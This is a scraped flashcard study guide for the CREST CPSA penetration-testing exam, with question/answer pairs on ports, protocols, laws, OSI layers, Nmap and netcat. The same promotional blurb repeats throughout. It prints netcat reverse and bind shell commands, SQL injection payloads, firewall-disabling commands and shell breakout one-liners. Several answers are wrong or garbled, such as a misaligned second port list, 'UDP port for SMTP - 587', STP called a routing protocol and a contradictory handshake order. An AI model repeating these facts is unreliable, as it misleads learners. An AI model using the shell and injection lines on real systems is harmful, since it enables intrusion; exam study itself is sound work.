Download CREST CPSA Exam Practice Questions and Answers 2025 and more Exams Computer Science in PDF only on Docsity!
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Squid Proxy - ans Benefits of a Penetration Test - ans- Enhancement of the management system
- Avoid fines
- Protection from financial damage
- Customer protection Structure of a Penetration Test - ansPlanning and Preparation Reconnaissance Discovery Analyzing information and risks Active intrusion attempts Final analysis Report Preparation Another Structure of a Penetration Test - ansReconnaissance Vulnerability Scanning Investigation Exploitation Infrastructure Testing - ansIncludes all internal computer systems, associated external devices, internet networking, cloud and virtualization testing. Types of Infrastructure Testing - ans- External Infrastructure Penetration Testing
- Internal Infrastructure Penetration Testing
- Cloud and Virtualization Penetration Testing
- Wireless Security Penetration Testing External Infrastructure Testing - ansMapping flaws in the external infrastructure Benefits of External Infrastructure Testing - ans- Identifies flaws within the firewall configuration that could be misused.
- Finds how information could be leaked out from the system
- Suggests how these issues could be fixed
- Prepares a comprehensive report highlighting the security risk of the networks and suggests solutions
- Ensures overall efficiency and productivity of your business Benefits of Internal Infrastructure Testing - ans- Identifies how an internal attacker could take advantage of even a minor security flaw
- Identifies the potential business risk and damage that an internal attacker can inflict
- Improves security systems of internal infrastructure
- Prepares a comprehensive report giving details of the security exposures of internal networks along with the detailed action plan on how to deal with it
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Benefits of Cloud and Virtualization Penetration Testing - ans- Discover the real risks within the virtual environment and suggests the methods and costs to fix the threats and flaws
- Provides guidelines and an action plan how to resolve the issues
- Improves the overall protection systems
- Prepares a comprehensive security system report of the cloud computing and virtualization, outline the security flaws, causes and possible solutions Benefits of Wireless Security Penetration Testing - ans- To find the potential risk caused by your wireless device
- To provide guidelines and an action plan on how to protect from the external threats
- For preparing a comprehensive security system report of the wireless networking, to outline the security flaw, causes, and possible solutions Black Box Testing - ansBlack-box testing is a method in which the tester is provided no information about the application being tested. Advantages of Black Box Testing - ans- Test is generally conducted with the perspective of a user, not the designer
- Verifies contradictions in the actual system and the specifications Disadvantages of Black Box Penetration Testing - ans- Particularly, these kinds of test cases are difficult to design
- Possibly, it is not worth, in case designer has already conducted a test case
- It does not conduct everything White Box Penetration Testing - ansA tester is provided a whole range of information about the systems and/or network such as schema, source code, os details, ip address, etc. Advantages of White Box Penetration Testing - ans- It ensures that all independent paths of a module have been exercised
- It ensures that all logical decisions have been verified along with their true and false value.
- It discovers the typographical errors and does syntax checking
- It finds the design errors that may have occurred because of the difference between logical flow of the program and the actual execution. Computer Misuse Act 1990 Highlights - ansSection 1: Unauthorized access to computer material Section 2: Unauthorized access with intent to commit or facilitate commission of further offenses Section 3: Unauthorized acts with intent to impair, or with recklessness as to impairing the operation of a computer Human Rights Act 1998 Highlights - ans- The right to life
- The right to respect for private and family life
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Scoping a Penetration Test - ans- All relevant risk owners
- Technical staff knowledgeable about the target system
- The penetration test team should identify what testing they believe will give a full picture of the vulnerability status of the estate
- A representative of the penetration test team
- Risk owners should outline any areas of special concern IP - ansThe IP (Internet Protocol) is the network layer communications protocol in the Internet protocol suite used for relaying datagrams across network boundaries. TCP - ansTCP (Transmission Control Protocol) is a main protocol from the Internet protocol suite. Task of TCP - ansTo create a connection between the client and server before data can be sent. User Datagram Protocol - ansApplications that do not require a reliable data stream use User Datagram Protocol. Task of the Internet Protocol - ansTo deliver packets from the source host to the destination host based on the IP addresses in the packet headers. UDP - ansYes, UDP is part of the Internet protocol suite. SYN in TCP handshake - ansSYN is used to initiate and establish a connection. It also helps you to synchronize sequence numbers between devices. UDP handshakes - ansNo, UDP does not perform handshakes. ACK in TCP handshake - ansHelps to confirm to the other side that it has received the SYN. SYN-ACK in TCP handshake - ansSYN-ACK is a SYN message from the local device and ACK of the earlier packet. FIN - ansUsed to terminate the connection. Three way handshake - ansTCP is known for performing a three way handshake. SYN - ansSYN stands for Synchronize. SYN-ACK phrase - ansAfter the SYN and ACK phrases of a TCP handshake, the next step is SYN-ACK. ACK - ansACK stands for Acknowledgement. SYN-ACK - ansSYN-ACK stands for Synchronize Acknowledgement. FIN in TCP - ansFIN stands for Finish. Port 9100 - ansJetdirect. Port 567 - ansDHCPv6 (servers). Port 593 - ansRPC over HTTPS. Port 49 - ansTACACS. TACACS - ansTerminal Access Control of Authentication and Control Systems.
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Port 514 - ansSyslog. Port 520 - ansRIP. Port 123 - ansNTP. Port 500 - ansInternet Security Association and Key Management Protocol - Key exchange. Port 587 - ansSMTP. UDP port for SMTP - ans587. Port 1521 - ansOracle. Port 6000 - ansX11. Port 21 - ansFTP. Port 389 - ansLDAP. Port 67 - ansDHCP server. Port 23 - ansTelnet. Port 546 - ansDHCPv6 (client). Port 445 - ansSMB. Port 161 - ansSNMP. Port 143 - ansIMAP. Port 1194 - ansVPN. Port 1434 - ansMS-SQL (monitoring). Port 636 - ansLDAPS. Port 3306 - ansMYSQL. Port 69 - ansTFTP. Port 25 - ansSMTP. Port 53 - ansDNS. Port 80 - ansHTTP. Port 139 - ansNETBIOS (session services). Port 1433 - ansMS-SQL. Port 2049 - ansNFS (Network File System). Port 5060 - ans(SIP) Session Initiation Protocol unencrypted signaling traffic (TCP/UDP). Port 3389 - ansRDP (Remote Desktop Protocol). Port 5222 - ansJabber. Port 179 - ansBorder Gateway protocol. Port 902 - ansVMWARE. Port 1080 - ansSOCKS Proxy. Ports for Dameware - ans6129, 1629. Port 6667 - ansIRC. Port 9001 - ansTor and HSQL.
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Layer 5 Function - ansMaintains connections and is responsible for controlling ports and sessions. Layer 2 Function - ansDefines the format of data on the network. Layer 3 Function - ansDecides which physical path the data will take. TCP Port 1 - ansTCP Port Service Multiplexer (TCPMUX). TCP Port 5 - ansRemote Job Entry (RJE). TCP Port 7 - ansECHO or ICMP. TCP Port 18 - ansMessage Send Protocol (MSP). TCP Port 29 - ansMSG ICP. TCP Port 37 - ansTime Protocol. TCP Port 42 - ansHost Name Server (Nameserv). TCP Port 43 - ansWHOIS. TCP Port 70 - ansGopher Services. TCP Port 79 - ansFinger. TCP Port 103 - ansX.400 Standard. TCP Port 159 - ansSQL Server. TCP Port 190 - ansGateway Access Control Protocol (GACP). TCP Port 118 - ansSQL Services. TCP Port 197 - ansDirectory Location Service (DLS). TCP Port 398 - ansNovell Netware over IP. TCP Port 119 - ansNNTP (Network News Transfer Protocol) Newsgroup. TCP Port 444 - ansSimple Network Paging Protocol (SNPP). TCP Port 453 - ansApple Quicktime. TCP Port 500 - ansIKE Internet Key Exchange. TCP/IP Model Mnemonic - ansNever Ingest Turian Almonds. CAT5 - ansCAT5 stands for category 5 cable, which is a twisted pair cable for computer networks. 10/100/1000baseT - ansAn Ethernet standard developed by the Institute of Electrical and Electronics Engineers (IEEE). Token Ring - ansA data link for a local area network (LAN) where all devices are connected in a ring or star topology. Wireless (802.11) - ansThe IEEE 802.11 is a standard used for wireless Ethernet networks. LM Hash - ansPrimary Windows LAN hash before Windows NT with a 14 character limit. DES Encryption - ansA 64 bit block cipher that has five modes of operation, repeated 16 times for each encryption/decryption operation. 3DES Encryption - ans168 bit key encryption (48 cycles).
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
TTL for Windows - ans128. TTL for Linux - ans64. TTL (Time to Live) - ansIndicates the maximum duration that an IPv4 packet can remain on the network before it is discarded. Cisco Password Encryption - ansVarious methods including secret 4: Crappy SHA256, secret 5: Salted MD5. SIP Requests - ansINVITE, ACK, BYE, CANCEL, OPTIONS, REGISTER, PRACK, SUBSCRIBE, NOTIFY, PUBLISH, INFO, REFER, MESSAGE, UPDATE. SMTP Requests - ansMAIL, RCPT, DATA. SNMP Requests - ansGet, GetNext, Set, GetBulk, Response, Trap, Inform. HTTP Status Codes - ans1xx - Info, 2xx - Success, 3xx - Redirection, 4xx - Error, 5xx - Server Error. HTTP Status Code 404 - ansNOT FOUND the method is not available. HTTP Status Code 302 - ansTemporarily Moved. HTTP Status Code 301 - ansMoved Permanently. HTTP Status Code 410 - ansGone. SQL Injection (Escape Characters) - ans' OR '1' = '1' --. SQL Injections (Type Handling) - ans1; DROP TABLE users. Linux File Permissions - ansdrwxrwxrwx 2 user(owner) group size date filename. Linux Command: Change Password - anspasswd . Linux Command: Find Files of Type - ansfind.
- typef - iname '.pdf' - ansFinds files of type PDF. locate '.pdf' - ansLocates PDF files in the system. /bin - ansUser Binaries /boot - ansBootup related files /dev - ansInterface for system devices /etc - ansSystem Config Files /home - ansBase directory for user files /lib - ansCritical software libraries /opt - ansThird party software /proc - ansSystem and running processes /root - ansHome for root /sbin - ansSys Admin binaries /tmp - ansTemporary Files /usr - ansLess critical files /var - ansVariable system files
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
IIS 1 Defaults - ansWindows NT Addon. IIS 4 Defaults - ansNT4 Option Pack. IIS 5 Defaults - ansWindows 2000. IIS 2 Defaults - ansNT 4.0. IIS 5.1 Defaults - ansWindows XP. IIS 3 Defaults - ansNT 4 Service Pack. IIS 6 Defaults - ansWindows Server 2003, Windows XP Pro. IIS 7 Defaults - ansWindows Vista, Server 2008. IIS 7.5 Defaults - ansWindows 7, 2008 R2. IIS 8 Defaults - ansWindows Server 2012, Windows 8. IIS 8.5 Defaults - ansWindows Server 2012 R2, Windows 8.1. IIS 10 v 1607 Defaults - ansWindows Server 2016, Windows 10 Anniversary Update. IIS 10 v 1709 Defaults - ansWindows 10 Fall Creators, v1709. IIS 10 v 1809 Defaults - ansWindows Server 2019, Windows 10 October Update. Windows Command: Disable Firewall - ansnetsh advfirewall set currentprofile state off, netsh advfirewall set allprofiles state off. Sysinternals Suite - ansA set of powerful Windows administration applications used to view, troubleshoot, and modify Windows functions. WMCI - ansWindows Management Instrumentation Command-Line. WMCI Command: Execute Process - answmci process call create "process_name". WMCI Command: Uninstall Software - answmci product where name="XX" call uninstall /nointeractive. PCI Card Info Storage Common-Use - ans- Store card details (i.e CC number, expiry) in encrypted form, - Store cardholder details (name, address, contact details...i.e PII) in a SEPARATE encrypted database with a unique reference identifier linking the two, - DO NOT STORE sensitive data (i.e CVV2, CVV or CID values). Windows: Active Directory Default Location - ansC:\Windows\NTDS. Windows: Domain Common Folders - ansC:\Windows\SYSVOL. dsquery - ansRemote Server Administration Tools (RSAT) feature pack tool used to enumerate Windows Domain. Classful IP Range: Class A - ans128 Networks (2^7), 16,777,216 Addresses per network (2^24). Classful IP Range: Class B - ans16,384 Networks (2^14), 65,536 Addresses per network (2^16). Classful IP Range: Class C - ans2,097,152 Networks (2^21), 256 Addresses per network (2^8).
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Classful IP Range Calculation - ansIf the first bit is a "0", it's a class A address. If the second bit is a "0", it's a class B address. If the third bit is a "0", it's a class C address. If the fourth bit is a "0", it's a class D address. If it's a "1", it's a class E address. Classless Subnets / CIDR - ansClass C - 255.255.255.0, /24 (254 Hosts), Class B - 255.255.0.0, /16 (65,534 Hosts), Class A - 255.0.0.0, /8 (16,777,214 Hosts). Hexadecimal Chart - ans0, 1, 2, 3, 4, 5, 5, 6, 7, 8, 9, 10 - A, 11 - B, 12 - C, 13 - D, 14 - E, 15 - F. VLAN - ansA switched network that is logically segmented by function, project team, or application, without regard to the physical locations of the users. VLAN IDs 1002- 1005 - ansToken Ring and FDDI VLANs VLAN IDs greater than 1005 - ansExtended-range VLANs (not stored in the VLAN database) VLAN IDs 1- 1005 - ansNormal-range VLANs vlan.dat - ansConfigurations for VLAN IDs 1- 1005 Netcat: Start Listener to Catch Shell - ansLinux: nc 10.0.0.1 1234 - e /bin/sh; Windows: nc 10.0.0.1 1234 - e cmd.exe (-e is execute and is not always supported) Netcat: Listen - ansnc - nlvp Netcat: Transfer Text or Binary Files - ansListener: nc - nlvp 4444 > incoming.exe; Sender: nc - nv IP to send to 4444 < file Netcat: Bind Shell - ansListener: nc - nlvp 4444 - e cmd.exe; Sender/ 'Talker': nc - nv IP to connect to 4444 Netcat: Reverse Shell - ansListener: nc - nlvp 4444; Sender: nc - nv IP to send to 4444 /bin/bash (sends shell!) NMap: Scan Types - ans-sP : ping scan; - sS : syn scan ('half open' scan); - sT : connect scan (full TCP); - sU : UDP scan; - sO : protocol scan Port Count - ans65,536 (2^16) Ports; This applies to TCP AND UDP NMap: Scan EVERY Port - ansTCP: nmap - p- ; UDP: nmap - sU - p- NMap: Common Options - ans-p1-65535 : Ports; - T[0-5] : 'Scan Speed', can help hide you; - n : No DNS Resolution; - O : OS Detection; - A : AGGRESSIVE; - sV : Version Detection; - PN : No Ping; - 6 : IPv6 Scan; - oA : Output ALL types NMap: DNS Reverse Lookup - ansnmap - R - sL - dns-server Hash Lengths - ansMD5 : 16 Bytes; SHA-1 : 20 bytes; SHA-256 : 32 Bytes; SHA-512 : 64 Bytes IIS - ansMicrosoft Web Server Apache / Tomcat - ansApache Web Servers GWS - ansGoogle Web Server
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
host.equiv (or .rhosts file) Structure - ansAllow any user to log in from any host; Allow any user from host with a matching local account to log in; Allow any user from host to log in; Allow user from host to log in as any non-root user; Allow all users with matching local accounts from host to log in except for baduser; Deny all users from host; Allow all users with matching local accounts on all hosts in a netgroup; Disallow all users on all hosts in a netgroup; Allow all users with matching local accounts on all hosts in a netgroup except baduser; Allow all users in a netgroup to log in from host as any non-root user Linux Shell Breakouts - anspython - c 'import pty;pty.spawn("/bin/bash")'; echo os.system('/bin/bash'); /bin/sh - i Language Vulns: Java (OO) - ansLog Injection; Deadlock; Language-based Attacks Language Vulns: C (Function) - ansCode Injection; Buffer Overflow Language Vulns: Objective-C (OO) - ansCode Insertion; Malformation; Race Conditions Language Vulns: C++ (OO) - ansRace conditions Language Vulns: PHP - ansIncorrect Element Removal NIC - ansNetwork Interface Card Network Interface Card (NIC) - ansAn expansion card that enables a computer to connect other computers or to a cable modem to facilitate a high-speed Internet connection. MAC - ansMedia Access Control Network Address Translation (NAT) - ansA technique that allows private IP addresses to be used on the public Internet. Physical (Bits) - ansLayer 1 of the OSI model. Data Link (Frames) - ansLayer 2 of the OSI model. Network (Packets) - ansLayer 3 of the OSI model. Transport (Segments) - ansLayer 4 of the OSI model. Session (Data) - ansLayer 5 of the OSI model. Presentation (Data) - ansLayer 6 of the OSI model. Application (Data) - ansLayer 7 of the OSI model. OSI Model - ansPlease Don't Nag Tyrannosaurus, She'll Probably Attack. TCP/IP Model - ansNever Ingest Turian Almonds. IETF - ansInternet Engineering Task Force. IANA - ansInternet Assigned Numbers Authority. Wireless Standards - ans802.11b - 2.4 GHz 11 Mbps; 802.11a - 5 GHz, 54 Mbps; 802.11g - 2.4 GHz, 54 Mbps; 802.11n - 5 GHz, 108 Mbps; 802.15 - Bluetooth 2.4 GHz. Data Link Protocols - ans1) SLIP (serial line internet protocol) 2) PPP (point-to-point protocol) 3) ARP (address resolution protocol) 4) RARP (reverse address resolution protocol)
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
- L2F (layer 2 forwarding) 6) L2TP (layer 2 tunneling protocol) 7) PPTP (point-to-point tunneling protocol) 8) ISDN (integrated services digital network). ARP - ansAddress Resolution Protocol. IGMP - ansInternet Group Management Protocol. FQDN - ansFully Qualified Domain Name. IOC - ansIndications of Compromise. POC - ansPoint of Contact. Proof of Concept - ansA demonstration to verify that certain concepts or theories have the potential for real-world application. SIEM - ansSecurity Information and Event Management. MBSA - ansMicrosoft Baseline Security Analyzer. Ethernet - ansA system for connecting a number of computer systems to form a local area network, with protocols to control the passing of information and to avoid simultaneous transmission by two or more systems. APIPA - ansAutomatic Private Internet Protocol Addressing. MTU - ansMaximum transmission unit - The largest data unit a network (for example, Ethernet or token ring) will accept for transmission. Unicast - ansA message that is sent from a single sender to a single recipient. Multicast - ansA form of transmission in which a message is delivered to a group of hosts. Router Protocol - ansA protocol used between routers so that they can learn routes to add to their routing tables. Link State Routing - ansA routing method that floods routing information to all routers within a network to build and maintain a more complex network route database. Distance Vector Routing - ansEach router passes a copy of its routing table to its adjacent neighbors. The neighbor adds the route to its own table, incrementing the metric to reflect the extra distance to the end network. Hybrid Routing - ansRouting protocol that uses the attributes of both distance vector and link state. IGP - ansInterior Gateway Protocol. EGP - ansExterior Gateway Protocol. IPv6 - ansA new protocol developed to replace IPv4, addressing the issue of IP address exhaustion. MAC address - ansA Media Access Control address is a hardware address that uniquely identifies each node on a network. Traditional MAC addresses are 12-digit (6 bytes, or 48 bits) hexadecimal numbers.
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
STP (Spanning Tree Protocol) - ansA Layer 2 protocol that is used for routing and prevents network loops by adopting a dynamic routing method. WEP - ansWired Equivalent Privacy. Wired Equivalent Privacy (WEP) - ansAn IEEE 802.11 security protocol designed to ensure that only authorized parties can view transmitted wireless information. WPA - ansWireless Protected Access Wireless Protected Access (WPA) - ansThe 802.11 security method created as a stopgap between WEP and 802.11i EAP (Extensible Authentication Protocol) - ansA protocol that enables systems to use hardware-based identifiers, such as fingerprint scanners or smart card readers, for authentication. EAP - ansExtensible Authentication Protocol LEAP - ansLightweight Extensible Authentication Protocol PEAP - ansProtected Extensible Authentication Protocol nbtstat - ansA Windows utility that is used to view and manage NetBIOS name cache information. Global Catalog Server - ansA domain controller that holds a subset of the information in all domain partitions for the entire Active Directory forest. Master Browser - ansPresent on every subnet. Needed for a routed TCP/IP network FSMO - ansFlexible Single Master Operations Flexible Single Master Operations (FSMO) Roles - ansAlso known as operations master roles, these are servers that provide certain functions that can only be handled by one domain controller at a time. LANMAN hash - ansThe original hash used to store Windows passwords, known as LM hash, based off the DES algorithm. (Legacy) NTLM - ansNew Technology LAN Manager NTLMv2 - ansNTLMv2 was developed in response to attacks against the LM authentication protocol. It uses the MD5 password hash algorithm. NTLM Hash - ansSuccessor to the LM hash. A more advanced hash used to store Windows passwords, based off the RC4 algorithm. OSPF (Open Shortest Path First) - ansA link-state routing protocol used on IP networks. Static Routing - ansA type of routing used by a network administrator to manually specify the mappings in the routing table. Dynamic Routing - ansAllows a router to determine the best route between two nodes automatically and then store this information in a routing table. Port 1 - ansTCP Port Service Multiplexer (TCPMUX)
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Port 5 - ansRemote Job Entry (RJE) Port 7 - ansECHO or ICMP Port 18 - ansMSG ICP Port 29 - anstime Port 37 - ansHost Name Server (Nameserv) Port 42 - ansWHOIS Port 43 - ansGopher Services Port 70 - ansGopher Services Port 118 - ansSQL Services Port 119 - ansNNTP (Network News Transfer Protocol) Port 79 - ansfinger Port 159 - ansSQL Server Port 103 - ansX.400 Standard Port 190 - ansGateway Access Control Protocol (GACP) Port 197 - ansDirectory Location Service (DLS) Port 396 - ansNovell Netware over IP Port 444 - ansSimple Network Paging Protocol (SNPP) Port 458 - ansApple QuickTime Computer Misuse Act 1990 - ansAn Act which makes illegal a number of activities such as deliberately planting viruses, hacking, using ICT equipment for fraud. Human Rights Act 1998 - ansAct of Parliament that incorporated the European Convention on Human Rights into UK law, making it enforceable in UK courts. Data Protection Act 1998 - ansThe UK law that tells organisations how they must protect the personal data of real people. (NOW GDPR) GDPR (General Data Protection Regulation) - ansNew European Union law on data protection and privacy for individuals. XSS (Cross Site Scripting) - ansA type of application attack where the attacker takes advantage of scripting and input validation vulnerabilities in an interactive website to attack legitimate users. MySQL < 5.1 Authentication Bypass - ansBug that allows authentication even when password provided is incorrect. DoS - ansDenial of Service DDoS (Distributed Denial of Service) - ansAn attack on a computer or network device in which multiple computers send data and requests to the device in an attempt to overwhelm it so that it cannot perform normal operations.
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
CONNECT - ansAn HTTP method used to establish a tunnel to the server identified by the target resource. OPTIONS - ansAn HTTP method used to describe the communication options for the target resource. TRACE - ansAn HTTP method used to perform a message loop-back test along the path to the target resource. PATCH - ansAn HTTP method used to apply partial modifications to a resource. LDAP Injection - ansAn attack that allows for the construction of LDAP statements based on user input, which can then be used to access or modify the LDAP database. Base64 Encoding - ansAn encoding scheme that represents binary data using only printable ASCII characters, typically used for encoding email attachments over SMTP. OSSTMM - ansOpen Source Security Testing Methodology Manual. ISECOM - ansInstitute for Security and Open Methodologies. OWASP - ansOpen Web Application Security Project. PTES - ansPen Testing Execution Standard. CPNI - ansCentre for the Protection of National Infrastructure (UK best practices). Police and Justice Act 2006 - ansDefines police limitations of searching technology. Computer Fraud and Abuse Act of 1986 - ansDefines cybercrime as any illegal act for which knowledge of computer technology is essential for its perpetration, investigation, or prosecution. HIPAA - ansHealth Insurance Portability and Accountability Act. FISMA - ansFederal Information Security Management Act. GLBA - ansGramm-Leach-Bliley Act. Gramm-Leach-Bliley Act of 1999 - ansRequires financial institutions to ensure the security and confidentiality of customer data. GDPR - ansGeneral Data Protection Regulation. FERPA - ansFamily Educational Rights and Privacy Act. PCI DSS - ansPayment Card Industry Data Security Standard. Basel Accord - ansAn agreement that required banks to hold as capital at least 8% of their risk-weighted assets. ISO 27000 Series - ansA series containing a range of individual standards and documents specifically reserved by ISO for information security. COBIT - ansControl Objectives for Information and Related Technology. IPv4 - ansThe Internet Protocol version 4 is the dominant protocol for routing traffic on the Internet, specifying 'to' and 'from' addresses using a dotted decimal such as '122.45.255.0'.
Verified Questions and Answers
This document offers a complete and updated set of CREST
CPSA (Certified Professional Security Analyst) exam practice
questions for 2025, graded A+ with all correct answers
provided. It covers all critical exam areas, including
penetration testing methodologies, TCP/IP protocols,
encryption, OSI layers, legal frameworks (e.g., Computer
Misuse Act, GDPR), Linux and Windows command-line tools,
network security tools (Nmap, Netcat, Wireshark), and
OWASP vulnerabilities. The content is ideal for thorough,
scenario-based exam preparation and aligns with CREST's
most recent testing standards.
Latest Updated Exam Guide 2025/
Cat 5 - ansCategory 5 wire, a TIA/EIA standard for UTP wiring that can operate at up to 100 Mbps. TTL - ansTime to Live. CSMA/CA - ansCarrier Sense Multiple Access with Collision Avoidance. CDMA - ansCode Division Multiple Access (GSM competitor).
